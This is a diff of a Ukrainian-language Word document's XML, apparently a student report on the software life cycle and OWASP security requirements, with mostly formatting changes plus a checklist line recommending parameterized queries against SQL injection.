+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6480"/>
+        </w:tabs>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="2F5175DD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="297E440E"/>
@@ -27181,7 +28198,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="35E3142D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -27294,7 +28311,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="48577FED"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CFAEF4BA"/>
@@ -27416,7 +28433,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="4B5255B3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0442CE44"/>
@@ -27565,7 +28582,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="53912F4C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="53BE25C4"/>
@@ -27714,7 +28731,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6">
+  <w:abstractNum w:abstractNumId="7">
     <w:nsid w:val="54BF63B5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="31EECCA0"/>
@@ -27827,7 +28844,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7">
+  <w:abstractNum w:abstractNumId="8">
     <w:nsid w:val="599D32D5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -27940,7 +28957,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8">
+  <w:abstractNum w:abstractNumId="9">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -28053,7 +29070,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9">
+  <w:abstractNum w:abstractNumId="10">
     <w:nsid w:val="6E2B310E"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -28166,7 +29183,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10">
+  <w:abstractNum w:abstractNumId="11">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -28280,37 +29297,40 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="3">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="7"/>
   </w:num>
-  <w:num w:numId="4">
-    <w:abstractNumId w:val="1"/>
-  </w:num>
-  <w:num w:numId="5">
-    <w:abstractNumId w:val="8"/>
-  </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="8">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="9">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="10">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="11">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="12">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -28474,6 +29494,26 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="20"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="004553F1"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
@@ -28657,6 +29697,21 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="20">
+    <w:name w:val="Заголовок 2 Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="004553F1"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -28819,6 +29874,26 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="20"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="004553F1"/>
+    <w:pPr>
+      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
   </w:style>
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
@@ -29001,6 +30076,21 @@
         <w:right w:w="108" w:type="dxa"/>
       </w:tblCellMar>
     </w:tblPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="20">
+    <w:name w:val="Заголовок 2 Знак"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="004553F1"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:eastAsia="ru-RU"/>
+    </w:rPr>
   </w:style>
 </w:styles>
 </file>
@@ -29295,7 +30385,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DF0FBC63-C6ED-4E1F-9A66-6A105C944A9E}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{78AC16E4-7FEA-41D9-9AC3-12F5C364D1F4}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>

<commit_message>
with owasp description + full life cycle v3
</commit_message>
<xml_diff>
--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -488,7 +488,25 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ілки, в результаті чого вийшов графік стандартного життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
+        <w:t xml:space="preserve">ілки, в результаті чого вийшов графік </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>стандартного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> життєвого індустріального циклу, показаний на рис. 1.2.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3840,7 +3858,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -3889,7 +3906,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -4098,7 +4114,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -4401,7 +4416,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -4414,7 +4428,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -6590,7 +6603,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -6677,15 +6689,13 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:br/>
       </w:r>
@@ -7399,7 +7409,7 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -10236,7 +10246,7 @@
           <w:color w:val="212121"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -18863,9 +18873,39 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Переконайтеся в тому, що всі запити </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18874,7 +18914,77 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>Переконайтеся в тому, що всі запити SQL, HQL, OSQL, NoSQL і процедури, що вимагають збережених процедур захищені з використанням підготовлених операторів або параметризації запитів, і, таким чином, не сприйнятливих до SQL ін'єкції</w:t>
+              <w:t>HQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>OSQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve">, </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>NoSQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> і процедури, що вимагають збережених процедур захищені з використанням підготовлених операторів або параметризації запитів, і, таким чином, не сприйнятливих до </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>SQL</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ін'єкції</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18908,7 +19018,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18943,7 +19053,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -18978,7 +19088,7 @@
                 <w:color w:val="212121"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
-                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -21905,17 +22015,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.1</w:t>
+              <w:t>5.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22172,17 +22272,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.2</w:t>
+              <w:t>5.2</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22451,17 +22541,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.3</w:t>
+              <w:t>5.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22546,17 +22626,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>безпеки</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.</w:t>
+              <w:t>безпеки.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -22708,17 +22778,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.4</w:t>
+              <w:t>5.4</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23049,17 +23109,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.5</w:t>
+              <w:t>5.5</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23286,17 +23336,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.6</w:t>
+              <w:t>5.6</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23513,17 +23553,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>5</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.7</w:t>
+              <w:t>5.7</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -23688,7 +23718,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -24442,7 +24471,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24709,7 +24737,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -24717,7 +24744,7 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:firstLine="348"/>
+        <w:ind w:left="0" w:firstLine="360"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -24725,7 +24752,6 @@
           <w:color w:val="2A2A2A"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24744,6 +24770,769 @@
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Список </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>OWASP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>містить</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
